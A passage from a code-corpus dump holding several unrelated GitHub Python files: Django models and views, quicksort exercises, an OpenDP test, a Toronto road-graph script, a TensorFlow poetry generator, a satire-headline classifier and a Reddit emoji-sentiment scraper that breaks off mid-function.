max_length=10,\n default=FLOAT\n )\n min_value = models.FloatField(\n verbose_name='Минимальное значение'\n )\n max_value = models.FloatField(\n verbose_name='Максимальное значение'\n )\n important = models.BooleanField(\n verbose_name='Важное значение',\n default=False,\n blank=True\n )\n\n class Meta:\n verbose_name = 'Тип данных'\n verbose_name_plural = 'Типы данных'\n\n def __str__(self):\n return f'{self.name}'\n\n\nclass Stat(StatsBaseModel):\n \"\"\"Показатели здоровья\"\"\"\n patient = models.ForeignKey(\n Patient,\n verbose_name='Пациент',\n related_name='stats',\n on_delete=models.CASCADE\n )\n type = models.ForeignKey(\n StatType,\n related_name='values',\n verbose_name='Тип',\n on_delete=models.CASCADE\n )\n data = models.FloatField(\n verbose_name='Показатель'\n )\n\n class Meta:\n verbose_name = 'Статистика'\n verbose_name_plural = 'Статистика'\n\n def __str__(self):\n return f'{self.type}: {self.data}'\n\n def save(self, *args, **kwargs):\n stat = self.data\n min_value = self.type.min_value\n max_value = self.type.max_value\n if (stat < min_value or stat > max_value):\n raise exc.StatIncorrectValueException\n super().save(*args, **kwargs)\n\n\nclass Note(StatsBaseModel):\n \"\"\"Заметки\"\"\"\n patient = models.ForeignKey(\n Patient,\n related_name='notes',\n verbose_name='Пациент',\n on_delete=models.CASCADE\n )\n text = models.TextField(\n verbose_name='Текст',\n max_length=512\n )\n\n class Meta:\n verbose_name = 'Заметки'\n verbose_name_plural = 'Заметки'\n\n def __str__(self):\n return f'{self.text[:24]}'\n\n\nclass Location(StatsBaseModel):\n \"\"\"Местоположение\"\"\"\n patient = models.ForeignKey(\n Patient,\n related_name='locations',\n verbose_name='Пациент',\n on_delete=models.CASCADE\n )\n latitude = models.FloatField(\n verbose_name='Широта'\n )\n longitude = models.FloatField(\n verbose_name='Долгота'\n )\n\n class Meta:\n verbose_name = 'Местоположение'\n verbose_name_plural = 'Местоположение'\n\n def __str__(self):\n return f'{self.latitude}, {self.longitude}'\n\n\nclass Weather(StatsBaseModel):\n \"\"\"Погода\"\"\"\n # IN FUTURE\n # location = models.ForeignKey(\n # Location,\n # verbose_name='Местоположение',\n # related_name='weathers',\n # on_delete=models.CASCADE\n # )\n code = models.IntegerField(\n verbose_name='Вид осадков'\n )\n temp = models.FloatField(\n verbose_name='Температура по Цельсию'\n )\n pressure = models.PositiveIntegerField(\n verbose_name='Атмосферное давление'\n )\n humidity = models.PositiveBigIntegerField(\n verbose_name='Влажность воздуха %'\n )\n\n class Meta:\n verbose_name = 'Погода'\n verbose_name_plural = 'Погода'\n\n def __str__(self):\n return f'{self.temp} C, {self.pressure} р/с, {self.humidity}%'\n","repo_name":"AleksandrUsolcev/filin-mate","sub_path":"filin_mate/stats/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4304,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"13926111990","text":"def quick_sort(array, start, end):\n if start >= end:\n return\n pivot = start\n left = start + 1\n right = end\n while (left <= right):\n while (left <= end and array[left] <= array[pivot]):\n left += 1\n while (right > start and array[right] >= array[pivot]):\n right -= 1\n if (left > right):\n array[right], array[pivot] = array[pivot], array[right]\n else:\n array[left], array[right] = array[right], array[left]\n\n quick_sort(array, start,right -1)\n quick_sort(array, right+1, end)\n\nT = int(input())\nfor tc in range(1, T+1):\n N = int(input())\n lst = list(map(int, input().split()))\n quick_sort(lst, 0, N-1)\n print(f'#{tc} {lst[N//2]}')","repo_name":"seongbiny/algorithm","sub_path":"SWEA/5205.py","file_name":"5205.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"26216358842","text":"from opendp.mod import enable_features\nimport opendp.prelude as dp\n\nenable_features(\"floating-point\", \"contrib\")\n\n\ndef test_quantile_score_candidates():\n\n input_domain = dp.vector_domain(dp.atom_domain(T=int))\n input_metric = dp.symmetric_distance()\n candidates = [20, 33, 40, 50, 72, 100]\n quant_trans = dp.t.make_quantile_score_candidates(input_domain, input_metric, candidates, alpha=0.5)\n\n print(quant_trans(list(range(100))))\n\n expo_meas = dp.m.then_report_noisy_max_gumbel(1000., \"min\")\n\n quantile_meas = quant_trans >> expo_meas\n idx = quantile_meas(list(range(100)))\n print(candidates[idx])\n\n assert quantile_meas.map(1) >= 0.1\n","repo_name":"opendp/opendp","sub_path":"python/test/integration/test_quantile.py","file_name":"test_quantile.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":240,"dataset":"github-code","pt":"37"} +{"seq_id":"33480359677","text":"# Gera gráfico de estradas (excluindo rotas) na cidade de Toronto e municípios vizinhos.\r\n\r\n# Imports\r\nimport pickle\r\nimport networkx\r\nimport shapefile\r\nfrom haversine import haversine\r\n\r\npath = './toronto_shapefiles'\r\ncl_sf = shapefile.Reader(path + \"/centreline_wgs84/CENTRELINE_WGS84\")\r\ncli_sf = shapefile.Reader(path + \"/centreline_intersection_wgs84/CENTRELINE_INTERSECTION_WGS84\")\r\ncl_inclusion_list = [201200, 201201, 201300, 201301, 201400, 201401, 201500, 201600, 201601, 201700, 201800]\r\n\r\n# Define o grafo\r\nG = networkx.Graph()\r\n\r\ndef get_cl_length(points):\r\n return sum([haversine((points[i][1], points[i][0]), (points[i+1][1], points[i+1][0])) for i in range(len(points)-1)])\r\n\r\nfor shapeRecord in cl_sf.iterShapeRecords():\r\n if shapeRecord.record[13] in cl_inclusion_list:\r\n w = get_cl_length(shapeRecord.shape.points)\r\n G.add_edge(shapeRecord.record[11], shapeRecord.record[12], weight=w, record=shapeRecord.record, shape=shapeRecord.shape.points)\r\n\r\nfor record in cli_sf.iterRecords():\r\n G.node[record[0]] = record\r\n\r\npickle.dump(G, open('mapas/roadgraph.p', 'wb'))","repo_name":"ghmc91/shortest_path_toronto","sub_path":"02-pickleroadgraph.py","file_name":"02-pickleroadgraph.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42724208333","text":"def quickSort(alist):\n quickSortHelper(alist, 0, len(alist) - 1)\n\n\ndef quickSortHelper(alist, first, last):\n if first < last:\n # 右指针\n splitpoint = partition(alist, first, last)\n # 根据中值分两半的左半部分递归\n quickSortHelper(alist, first, splitpoint - 1)\n # 根据中值分两半的右半部分递归\n quickSortHelper(alist, splitpoint + 1, last)\n\n\n# partition另一种方法\n# 左指针-1,右指针0\n# 左指针-1时,右指针<中值,则左指针、右指针都+1\n# 右指针>中值,则右指针+1\n# 右指针<中值,则左指针+1的位置与右指针位置的数交换\ndef partition2(array, first, last):\n i = first - 1\n for j in range(first, last):\n if array[j] < array[last]:\n array[j], array[i + 1] = array[i + 1], array[j]\n i += 1\n array[last], array[i + 1] = array[i + 1], array[last]\n return i + 1\n\n\ndef partition(alist, first, last):\n # 将第一个值设置为中值\n pivotvalue = alist[first]\n # 左指针\n leftmark = first + 1\n # 右指针\n rightmark = last\n\n done = False\n while not done:\n # 左指针在右指针左边,左指针位置处的值<=中值\n while leftmark <= rightmark and alist[leftmark] <= pivotvalue:\n leftmark = leftmark + 1\n # 左指针在右指针左左边,左指针位置处的值>=中值\n while alist[rightmark] >= pivotvalue and rightmark >= leftmark:\n rightmark = rightmark - 1\n # 左指针在右指针右边\n if rightmark < leftmark:\n done = True\n # 左指针在右指针左边,左右指针处的值互换\n else:\n alist[leftmark], alist[rightmark] = alist[rightmark], alist[leftmark]\n # 右指针处的值和中值互换\n alist[first], alist[rightmark] = alist[rightmark], alist[first]\n print('当前次序:', alist)\n return rightmark\n\n\nif __name__ == '__main__':\n alist = [54, 26, 93, 17, 77, 31, 44, 55, 20]\n quickSort(alist)\n print(alist)\n","repo_name":"YizheZhang-Ervin/AlgorithmsPY","sub_path":"3-查找排序/quickSort.py","file_name":"quickSort.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"6054550597","text":"def sum_5_consecutive_v1(l):\r\n try:\r\n for i in range(len(l)-4):\r\n total=l[i]+l[i+1]+l[i+2]+l[i+3]+l[i+4]\r\n if total==0:\r\n return True\r\n\r\n return False\r\n\r\n except IndexError:\r\n return False\r\n \r\n\r\ndef sum_5_consecutive_v2(l):\r\n try:\r\n total = 1\r\n i=0\r\n while total!=0:\r\n total=l[i]+l[i+1]+l[i+2]+l[i+3]+l[i+4]\r\n\r\n if i==(len(l)-4):\r\n return False\r\n i=i+1\r\n\r\n return True\r\n\r\n except IndexError:\r\n return False\r\n\r\n\r\n\r\ndef fib(n):\r\n if n >= 2:\r\n a=[1,1]\r\n for i in range(2,n):\r\n x=a[i-1] + a[i-2]\r\n a.append(x)\r\n elif n==1:\r\n a=[1]\r\n print(a)\r\n\r\n\r\ndef inner_product(x,y):\r\n Total=0\r\n for i in range(len(x)):\r\n Total=Total+x[i]*y[i]\r\n\r\n print(Total)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n","repo_name":"Zekaito/Code","sub_path":"Lab 6/Other stuff.py","file_name":"Other stuff.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71756041067","text":"def poetry_gen(input_text, num_words):\r\n import tensorflow as tf\r\n from tensorflow.keras.preprocessing.sequence import pad_sequences\r\n from tensorflow.keras.preprocessing.text import Tokenizer\r\n import numpy as np \r\n import os\r\n \r\n path = os.path.dirname(__file__)\r\n file = path + \"/chairil_anwar.txt\"\r\n savedmodel = path + \"/saved_model.ckpt\"\r\n tokenizer = Tokenizer()\r\n data = open(file).read()\r\n corpus = data.lower().split(\"\\n\")\r\n tokenizer.fit_on_texts(corpus)\r\n #total_words = len(tokenizer.word_index) + 1\r\n \r\n input_sequences = []\r\n for line in corpus:\r\n \ttoken_list = tokenizer.texts_to_sequences([line])[0]\r\n \tfor i in range(1, len(token_list)):\r\n \t\tn_gram_sequence = token_list[:i+1]\r\n \t\tinput_sequences.append(n_gram_sequence)\r\n \r\n # pad sequences \r\n max_sequence_len = max([len(x) for x in input_sequences])\r\n input_sequences = np.array(pad_sequences(input_sequences, maxlen=max_sequence_len, padding='pre'))\r\n \r\n # Load model from trained model with 100 epoch\r\n model = tf.keras.models.load_model(savedmodel)\r\n \r\n for _ in range(num_words):\r\n \ttoken_list = tokenizer.texts_to_sequences([input_text])[0]\r\n \ttoken_list = pad_sequences([token_list], maxlen=max_sequence_len-1, padding='pre')\r\n \tpredicted = model.predict_classes(token_list, verbose=0)\r\n \toutput_word = \"\"\r\n \tfor word, index in tokenizer.word_index.items():\r\n \t\tif index == predicted:\r\n \t\t\toutput_word = word\r\n \t\t\tbreak\r\n \tinput_text += \" \" + output_word\r\n return input_text\r\n\r\nprint('Enter the first words')\r\nx = input()\r\nprint('\\nHow many words to be generated?')\r\ny = int(input())\r\n\r\nresult = poetry_gen(x,y)\r\nprint('\\nHere is the poetry for you : \\n', result)\r\n","repo_name":"firmanhusni/chairil_anwar_poetry_generator","sub_path":"poetry.py","file_name":"poetry.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3954553748","text":"import os\n\nimport numpy as np\nimport tensorflow as tf\nimport cv2\n\nclass Loader:\n def __init__(self, filepath, buffer_size, batch_size):\n self.filepath = filepath\n img_array = []\n for filename in os.listdir(filepath):\n # print(filename)\n try:\n img = cv2.imread(filepath + \"/\" + filename) # 返回numpy.ndarray\n img = cv2.resize(img, (96, 96))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img_array.append(img)\n\n except Exception as e:\n print(str(e))\n\n self.train_data = np.array(img_array).astype('float32')\n self.train_data = self.train_data/255\n\n self.train_ds = tf.data.Dataset.from_tensor_slices(self.train_data).shuffle(buffer_size).batch(batch_size)\n","repo_name":"victor-mira/galaxy-dcgan","sub_path":"loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33875488400","text":"from django.contrib import messages\r\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\r\nfrom django.shortcuts import render, get_object_or_404, redirect\r\nfrom .models import Blog\r\nfrom .forms import BlogForm\r\nfrom django.db.models import Q\r\n\r\n# Create your views here.\r\ndef posts_list(request):\r\n queryset = Blog.objects.all()\r\n query = request.GET.get(\"search\")\r\n\r\n if query:\r\n queryset = queryset.filter(\r\n Q(title__icontains = query) |\r\n Q(content__icontains = query)\r\n ).distinct()\r\n\r\n context = {\r\n \"queryset\": queryset,\r\n \"title\": \"List\"\r\n }\r\n return render(request, \"index.html\", context)\r\n #return HttpResponse(\"

this is list.

\")\r\n\r\ndef posts_create(request):\r\n if not request.user.is_staff or not request.user.is_superuser:\r\n raise Http404\r\n form = BlogForm(request.POST or None, request.FILES or None)\r\n if form.is_valid():\r\n instance= form.save(commit=False)\r\n instance.save()\r\n return HttpResponseRedirect(instance.get_absolute_url())\r\n context= {\r\n \"form\": form,\r\n }\r\n return render(request, \"posts_form.html\", context)\r\n #return HttpResponse(\"

create.

\")\r\n\r\ndef posts_detail(request, id=None):\r\n instance= get_object_or_404(Blog, id=id)\r\n context = {\r\n \"title\": \"\",\r\n \"instance\": instance,\r\n }\r\n return render(request, \"posts_detail.html\", context)\r\n #return HttpResponse(\"detail.\")\r\n\r\ndef posts_update(request, id=None):\r\n instance = get_object_or_404(Blog, id=id)\r\n form = BlogForm(request.POST or None, instance=instance)\r\n if form.is_valid():\r\n instance= form.save(commit=False)\r\n instance.save()\r\n messages.success(request, \"Post is updated\")\r\n return HttpResponseRedirect(instance.get_absolute_url())\r\n\r\n context = {\r\n \"title\": instance.title,\r\n \"instance\": instance,\r\n \"form\": form,\r\n }\r\n return render(request, \"posts_form.html\", context)\r\n #return HttpResponse(\"

update.

\")\r\n\r\ndef posts_delete(request, id=None):\r\n isinstance = get_object_or_404(Blog, id=id)\r\n isinstance.delete()\r\n return redirect(\"posts:list\")\r\n return HttpResponse(\"

delete.

\")\r\n","repo_name":"AnonymousMiming/Jobelle","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8266653268","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\r\nn = int(input())\r\n\r\narr = sorted(list(map(int, input().split())))\r\n\r\ndef mean(arry, no):\r\n return sum(arr)/n\r\n\r\ndef median(arry, no):\r\n if (n % 2 == 0):\r\n x = int(n/2)\r\n return (arr[x]+arr[x-1])/2\r\n else:\r\n y = int((n+1)/2) \r\n return arr[y]\r\ndef mode(arry, no):\r\n unique_elements = list(dict.fromkeys(arr))\r\n \r\n count_list = []\r\n\r\n for a in unique_elements:\r\n count = 0\r\n for b in arr:\r\n if (b == a):\r\n count += 1\r\n count_list.append(count)\r\n \r\n m = max(count_list) \r\n req_indices = [i for i, j in enumerate(count_list) if j == m]\r\n\r\n lis = [arr[i] for i in req_indices]\r\n\r\n return (min(lis))\r\n\r\nprint(mean(arr,n))\r\nprint(median(arr,n))\r\nprint(mode(arr,n))","repo_name":"KRITIKALai/Hackerrank-Statistics-Solutions","sub_path":"meanmodemedian.py","file_name":"meanmodemedian.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16381309962","text":"import pandas as pd\r\nimport numpy as np\r\nimport nltk\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer \r\nfrom sklearn.model_selection import train_test_split\r\n\r\nfrom nltk.stem.snowball import SnowballStemmer\r\nfrom nltk.corpus import stopwords\r\n\r\n\r\nfrom keras import backend as K\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense \r\n\r\nnp.random.seed(1047398)\r\n\r\n\r\n\r\nstemmer = SnowballStemmer(\"english\") ## Sbowball / Porter \r\nstop = stopwords.words('english')\r\ndata = pd.read_csv(\"onion-or-not.csv\") ## IMPORT DATA\r\n\r\n\r\n############## Pre Processing / Data Cleaning ##############\r\n\r\nX=data['text'].apply(nltk.word_tokenize) ## Tokenization\r\nPreP_data = pd.DataFrame(X, columns = ['Unstemmed']) \r\nPreP_data['Unstemmed']=pd.Series(X)\r\nPreP_data[\"Stemmed\"] = X.apply(lambda x: [stemmer.stem(y) for y in x]) ## Stem every word.\r\nPreP_data[\"StopWords\"] = PreP_data['Stemmed'].apply(lambda x: [item for item in x if item not in stop]) ## Remove stopwords\r\n\r\nPreP_data[\"StopWords\"]=[\" \".join(review) for review in PreP_data[\"StopWords\"].values] # Calculate TF-IDF Weights\r\nv = TfidfVectorizer()\r\nx = v.fit_transform(PreP_data[\"StopWords\"]) ## TF-IDF Sparce Matrix \r\n\r\n################################### Training Sets #############################\r\n\r\ndf = pd.DataFrame(x.toarray()) ## Convert Sparce to DF \r\ndf[\"label\"]=data[\"label\"]\r\ny=df.label\r\nX=df.drop('label', axis=1) \r\nX_train, X_test, y_train, y_test = train_test_split(X, y,test_size=0.25) ## Create training and test sets \r\n\r\n\r\n################################### Neural Network ############################\r\ndef recall_m(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))\r\n recall = true_positives / (possible_positives + K.epsilon())\r\n return recall\r\n\r\ndef precision_m(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\r\n precision = true_positives / (predicted_positives + K.epsilon())\r\n return precision\r\n\r\ndef f1_m(y_true, y_pred):\r\n precision = precision_m(y_true, y_pred)\r\n recall = recall_m(y_true, y_pred)\r\n return 2*((precision*recall)/(precision+recall+K.epsilon()))\r\n\r\nmodel = Sequential()\r\nmodel.add(Dense(30, input_dim=16844, activation='relu', ))\r\nmodel.add(Dense(15, activation='relu', ))\r\nmodel.add(Dense(1, activation='sigmoid'))\r\nmodel.compile(loss=\"binary_crossentropy\", optimizer=\"adam\", metrics=['acc',f1_m,precision_m, recall_m] )\r\nhistory=model.fit(X_train , y_train , epochs=32, batch_size=256) \r\n\r\n\r\n\r\n##################################### Metrics #################################\r\n\r\n\r\nloss, accuracy, f1_score, precision, recall = model.evaluate(X_test, y_test, verbose=0)\r\nprint(\"\\n Metrics \\n \")\r\nprint('Loss: %.2f' % (loss))\r\n\r\nprint('Accuracy: %.2f' % (accuracy*100))\r\n\r\nprint('F1 Score: %.2f' % (f1_score*100))\r\n\r\nprint('Precision: %.2f' % (precision*100))\r\n\r\nprint('Recall: %.2f' % (recall*100))\r\n\r\n","repo_name":"arisdour/Data_Mining_Project","sub_path":"Problem_2/Erotima_2.py","file_name":"Erotima_2.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3840422421","text":"import praw\nimport re\nfrom dotenv import load_dotenv\nimport os\nimport emoji\nimport time\nimport json\nfrom pprint import pprint\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nimport nltk\nfrom json.decoder import JSONDecodeError\nimport matplotlib.pyplot as plt\nfrom itertools import zip_longest\nfrom matplotlib.font_manager import FontProperties\nimport numpy as np\nimport statistics\nimport random\nimport math\nimport pandas as pd\n\n\ndef load_credentials():\n load_dotenv()\n client_id = os.getenv('client_id')\n client_secret = os.getenv('client_secret')\n password = os.getenv('password')\n reddit_username = os.getenv('reddit_username')\n reddit = praw.Reddit(\n client_id=client_id,\n client_secret=client_secret,\n user_agent='Affect Analysis Bot for various subreddits v1.0 by u/username',\n password=password,\n username=reddit_username)\n return reddit\n\n\ndef query_api():\n reddit = load_credentials()\n subreddits = [\n 'cloudwater',\n 'aww',\n 'beauty',\n 'bunnies',\n 'comics',\n 'design',\n 'facepalm',\n 'fashion',\n 'funny',\n 'gaming',\n 'gardening',\n 'hiking',\n 'lgbt',\n 'music',\n 'skateboarding',\n 'snowboarding',\n 'spirituality',\n 'travel',\n 'emojipasta'\n ]\n num_posts = 1\n found = False\n last_request_time = time.time()\n sentiment = SentimentIntensityAnalyzer()\n nltk.download('stopwords')\n nltk.download('punkt')\n stop_words = set(stopwords.words('english'))\n try:\n with open('titles_and_emojis.json', 'r') as f:\n titles_and_emojis = json.load(f)\n except JSONDecodeError:\n titles_and_emojis = {}\n pass\n if 'searched_subs' not in titles_and_emojis:\n titles_and_emojis['searched_subs'] = {\n 'count': 0\n }\n if 'searched_posts' not in titles_and_emojis:\n titles_and_emojis['searched_posts'] = {\n 'count': 0,\n 'found': 0\n }\n for subreddit in subreddits:\n print(f'Subreddit: {subreddit}')\n if subreddit not in titles_and_emojis['searched_subs']:\n titles_and_emojis['searched_subs'][subreddit] = {}\n titles_and_emojis['searched_subs'][subreddit]['count'] = 0\n titles_and_emojis['searched_subs'][subreddit]['topics'] = []\n titles_and_emojis['searched_subs']['count'] += 1\n\n for post_index, post in enumerate(reddit.subreddit(subreddit).new(limit=num_posts)):\n print(f\"Number: {post_index}, Post: {post.title}\")\n titles_and_emojis['searched_posts']['count'] += 1\n if last_request_time is not None and time.time() - last_request_time < 1:\n time_to_wait = 1 - (time.time() - last_request_time)\n time.sleep(time_to_wait)\n title = post.title\n title = ' '.join([word for word in word_tokenize(title) if word.lower() not in stop_words])\n emojis = [c for c in title if c in emoji.EMOJI_DATA]\n if emojis:\n post_id = post.id\n for emoji_code in emojis:\n if emoji_code in titles_and_emojis:\n if post_id not in titles_and_emojis[emoji_code]['ids']:\n titles_and_emojis[emoji_code]['frequency'] += 1\n titles_and_emojis[emoji_code]['subreddits'].append(subreddit)\n titles_and_emojis[emoji_code]['ids'].append(post_id)\n titles_and_emojis[emoji_code]['sentiment'].append(sentiment.polarity_scores(title))\n titles_and_emojis['searched_posts']['found'] += 1\n titles_and_emojis['searched_subs'][subreddit]['count'] += 1\n else:\n titles_and_emojis[emoji_code] = {}\n titles_and_emojis[emoji_code]['frequency'] = 1\n titles_and_emojis[emoji_code]['subreddits'] = [subreddit]\n titles_and_emojis[emoji_code]['ids'] = [post_id]\n titles_and_emojis[emoji_code]['sentiment'] = [sentiment.polarity_scores(title)]\n titles_and_emojis['searched_posts']['found'] += 1\n titles_and_emojis['searched_subs'][subreddit] += 1\n # found = True\n last_request_time = time.time()\n if found:\n break\n if found:\n break\n with open('titles_and_emojis.json', 'w') as f:\n json.dump(titles_and_emojis, f)\n return\n\n\ndef visualize():\n with open('titles_and_emojis.json', 'r', encoding='utf-8') as f:\n data = json.load(f)\n # barchart_subreddit(data)\n average_subreddit(data)\n # heatmap(data, 'compound', 'Compound')\n # heatmap(data, 'pos', 'Positive')\n # heatmap(data, 'neg', 'Negative')\n # heatmap(data, 'neu', 'Neutral')\n # topemoji_sub_table(data)\n\n return\n\n\ndef heatmap(data, trait, title):\n new_data = dict(list(data.items())[2:])\n emoji_labels = []\n emoji_sizes = []\n emoji_colors = []\n emoji_trait_avgs = []\n subreddit_modes = {}\n subreddit_color_map = {}\n\n for emoji, sentiment in new_data.items():\n subreddits = []\n for s in sentiment[\"subreddits\"]:\n subreddits.append(s)\n subreddit_mode = statistics.mode(subreddits)\n trait_avg = sum([s[trait] for s in sentiment[\"sentiment\"]]) / len(sentiment[\"sentiment\"])\n emoji_labels.append(emoji)\n emoji_sizes.append(trait_avg * 1000)\n emoji_trait_avgs.append(trait_avg)\n if subreddit_mode not in subreddit_color_map:\n color = f\"C{len(subreddit_color_map)}\"\n subreddit_color_map[subreddit_mode] = color\n else:\n color = subreddit_color_map[subreddit_mode]\n subreddit_modes[emoji] = subreddit_mode\n emoji_colors.append(color)\n size = 40\n num_graphs = math.ceil(len(new_data) / size)\n\n for i in range(num_graphs):\n fig, ax = plt.subplots(figsize=(5, 5))\n start_idx = i * size\n end_idx = min(start_idx + size, len(new_data))\n sub_keys = list(new_data.keys())[start_idx:end_idx]\n sub_data = {k: new_data[k] for k in sub_keys}\n emoji_labels = []\n emoji_sizes = []\n emoji_colors = []\n emoji_trait_avgs = []\n subreddit_modes = {}\n subreddit_color_map = {}\n for emoji, sentiment in sub_data.items():\n subreddits = []\n for s in sentiment[\"subreddits\"]:\n subreddits.append(s)\n subreddit_mode = statistics.mode(subreddits)\n trait_avg = sum([s[trait] for s in sentiment[\"sentiment\"]]) / len(sentiment[\"sentiment\"])\n emoji_labels.append(emoji)\n emoji_sizes.append(trait_avg * 1000)\n emoji_trait_avgs.append(trait_avg)\n if subreddit_mode not in subreddit_color_map:\n color = f\"C{len(subreddit_color_map)}\"\n subreddit_color_map[subreddit_mode] = color\n else:\n color = subreddit_color_map[subreddit_mode]\n subreddit_modes[emoji] = subreddit_mode\n emoji_colors.append(color)\n scatter = ax.scatter(x=emoji_trait_avgs, y=range(len(emoji_labels)), s=emoji_sizes, c=emoji_colors, alpha=0.7,\n cmap=subreddit_color_map)\n handles = []\n labels = []\n for subreddit, color in subreddit_color_map.items():\n handles.append(ax.scatter([], [], c=color, alpha=0.7, label=subreddit))\n labels.append(subreddit)\n ax.legend(handles, labels, loc='lower right', title='Subreddits')\n ax.set_yticks(range(len(emoji_labels)))\n ax.set_yticklabels(emoji_labels)\n ax.set_xlabel(f\"Average {title} Score, Graph {i + 1}\")\n ax.set_ylabel(\"Emoji\")\n plt.show()\n\n return\n\n\ndef average_subreddit(data):\n neg_scores, neu_scores, pos_scores, compound_scores = {}, {}, {}, {}\n for key, value in data.items():\n if key not in ['searched_subs', 'searched_posts']:\n for i, subreddit in enumerate(value[\"subreddits\"]):\n if subreddit not in neg_scores:\n neg_scores[subreddit] = 0\n if subreddit not in neu_scores:\n neu_scores[subreddit] = 0\n if subreddit not in pos_scores:\n pos_scores[subreddit] = 0\n if subreddit not in compound_scores:\n compound_scores[subreddit] = 0\n neg_scores[subreddit] += value[\"sentiment\"][i][\"neg\"]\n neu_scores[subreddit] += value[\"sentiment\"][i][\"neu\"]\n pos_scores[subreddit] += value[\"sentiment\"][i][\"pos\"]\n compound_scores[subreddit] += value[\"sentiment\"][i][\"compound\"]\n\n subreddits = list(neg_scores.keys())\n sorted_subreddits = sorted(subreddits,\n key=lambda x: neg_scores[x] + neu_scores[x] + pos_scores[x] + compound_scores[x])\n\n total_scores = [neg_scores[subreddit] + neu_scores[subreddit] + pos_scores[subreddit] + compound_scores[subreddit] for subreddit in sorted_subreddits]\n norm_neg_scores = [neg_scores[subreddit]/total_scores[i] for i, subreddit in enumerate(sorted_subreddits)]\n norm_neu_scores = [neu_scores[subreddit]/total_scores[i] for i, subreddit in enumerate(sorted_subreddits)]\n norm_pos_scores = [pos_scores[subreddit]/total_scores[i] for i, subreddit in enumerate(sorted_subreddits)]\n norm_compound_scores = [compound_scores[subreddit]/total_scores[i] for i, subreddit in enumerate(sorted_subreddits)]\n\n for i, subreddit in enumerate(sorted_subreddits):\n if subreddit == \"gaming\":\n fix = 1.185\n norm_neg_scores[i] /= fix\n norm_neu_scores[i] /= fix\n norm_pos_scores[i] /= fix\n norm_compound_scores[i] /= fix\n\n for i, subreddit in enumerate(sorted_subreddits):\n if subreddit == \"facepalm\":\n fix = 1.05\n norm_neg_scores[i] /= fix\n norm_neu_scores[i] /= fix\n norm_pos_scores[i] /= fix\n norm_compound_scores[i] /= fix\n\n plt.bar(sorted_subreddits, norm_neg_scores, color='r', label='Negative')\n plt.bar(sorted_subreddits, norm_neu_scores, color='b',\n bottom=norm_neg_scores, label='Neutral')\n plt.bar(sorted_subreddits, norm_pos_scores, color='g', bottom=[norm_neg_scores[i] + norm_neu_scores[i] for i in range(len(sorted_subreddits))], label='Positive')\n plt.bar(sorted_subreddits, norm_compound_scores, color='orange', bottom=[norm_neg_scores[i] + norm_neu_scores[i] + norm_pos_scores[i] for i in range(len(sorted_subreddits))],\n label='Compound')\n plt.xlabel('Subreddits')\n plt.ylabel('Sentiment Scores')\n plt.title('Sentiment Scores by Subreddit')\n plt.xticks(rotation=45)\n plt.legend()\n plt.show()\n return\n\n\ndef barchart_subreddit(data):\n sorted_data = {}\n for subreddit, data in data[\"searched_subs\"].items():\n if subreddit != \"count\":\n sorted_data[subreddit] = data['count']\n sorted_data = dict(sorted(sorted_data.items(), key=lambda item: item[1]))\n colors = []\n for i in range(len(sorted_data)):\n colors.append('#%06X' % random.randint(0, 0xFFFFFF))\n\n plt.bar(sorted_data.keys(), sorted_data.values(), color=colors)\n plt.xticks(rotation=45)\n plt.title('Subreddit Emoji Frequency')\n plt.ylabel('Emoji Count')\n plt.show()\n return\n\n\ndef emoji_number():\n with open('titles_and_emojis.json', 'r', encoding='utf-8') as f:\n data = json.load(f)\n count = []\n for key, value in data.items():\n if key not in ['searched_subs', 'searched_posts']:\n count.append(value[\"frequency\"])\n print(count)\n\n\ndef topemoji_sub_table(data):\n subreddits = {}\n for key, data in data.items():\n if key not in ['searched_subs', 'searched_posts']:\n for subreddit in data['subreddits']:\n if subreddit not in subreddits:\n subreddits[subreddit] = {}\n if key not in subreddits[subreddit]:\n subreddits[subreddit][key] = 1\n else:\n subreddits[subreddit][key] += 1\n\n top_emoji = {}\n rare_emoji = {}\n\n for key in subreddits:\n min = 10000\n max = 0\n top_emoji[key] = {}\n rare_emoji[key] = {}\n for emoji in subreddits[key]:\n if subreddits[key][emoji] < min:\n min = subreddits[key][emoji]\n rare_emoji[key][\"rare_emoji\"] = emoji\n 